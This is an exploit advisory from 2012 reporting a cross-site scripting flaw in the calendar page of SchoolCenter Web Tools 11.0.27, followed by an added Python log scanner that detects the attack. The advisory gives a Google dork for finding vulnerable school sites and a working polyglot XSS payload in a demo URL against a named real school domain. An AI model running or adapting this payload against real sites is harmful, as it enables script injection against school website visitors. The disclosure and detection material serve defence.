
SchoolCenter Web Tools 11.0.27 Cross Site Scripting

Posted on 12 April 2012

# Exploit Title: SchoolCenter Web Tools Version 11.0.27 Cross Site Scripting
# Date: 11.04.2012
# Author: Sony and Flexxpoint
# Software Link: www.thinqed.com
# Google Dorks: inurl:/education/components/calendar/ site:edu
# Web Browser : Mozilla Firefox
# Site : http://insecurity.ro
# PoC: http://st2tea.blogspot.com/2012/04/schoolcenter-web-tools-version-11027.html
..................................................................

Well, we have xss in calendar.

Demo:

http://schoolctr.hebisd.edu/education/components/calendar/default.php?sectiondetailid=74&my_family=&d=4&m=4&y=2012&et=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3Eday

http://4.bp.blogspot.com/-iUHFDKmBpO8/T4W34sQCX4I/AAAAAAAAA8g/uKfMF4sIUrQ/s1600/xss.JPG

etc..
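
A defender-side check for the issue above, as an added example that is not part of the original advisory: it scans web server access log lines for requests to the calendar page whose parameters carry anything other than plain values. The expected value patterns (including the assumption that et normally holds a short word such as day) and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path taken from the advisory's demo URL.
CALENDAR_PATH = "/education/components/calendar/default.php"

# Assumed shapes of legitimate values (not taken from vendor documentation).
EXPECTED = {
    "sectiondetailid": re.compile(r"\d{1,10}"),
    "d": re.compile(r"\d{1,2}"),
    "m": re.compile(r"\d{1,2}"),
    "y": re.compile(r"\d{4}"),
    "et": re.compile(r"[A-Za-z]{1,16}"),
}

# Request field of a common/combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(request_target):
    """Return {param: decoded value} for calendar parameters that break the expected shape."""
    parts = urlsplit(request_target)
    if parts.path.lower() != CALENDAR_PATH:
        return {}
    bad = {}
    # parse_qs percent-decodes, so encoded markup is compared in decoded form.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        pattern = EXPECTED.get(name)
        for value in values:
            if pattern and value and not pattern.fullmatch(value):
                bad[name] = value
    return bad

def scan(lines):
    """Return (line number, offending params) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        bad = suspicious_params(match.group(1)) if match else {}
        if bad:
            hits.append((number, bad))
    return hits

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Apr/2012:10:00:01 +0000] "GET /education/components/calendar/default.php?sectiondetailid=74&my_family=&d=4&m=4&y=2012&et=day HTTP/1.1" 200 5120',
    '192.0.2.11 - - [12/Apr/2012:10:00:07 +0000] "GET /education/components/calendar/default.php?sectiondetailid=74&my_family=&d=4&m=4&y=2012&et=%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3Eday HTTP/1.1" 200 5342',
    '192.0.2.12 - - [12/Apr/2012:10:00:09 +0000] "GET /index.php?et=%3Cb%3E HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for number, bad in scan(SAMPLE_LOG):
        print(number, bad)
```

The same allowlist, applied server-side before the value is written into the page together with HTML output encoding, is the corresponding fix on the application side.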

 
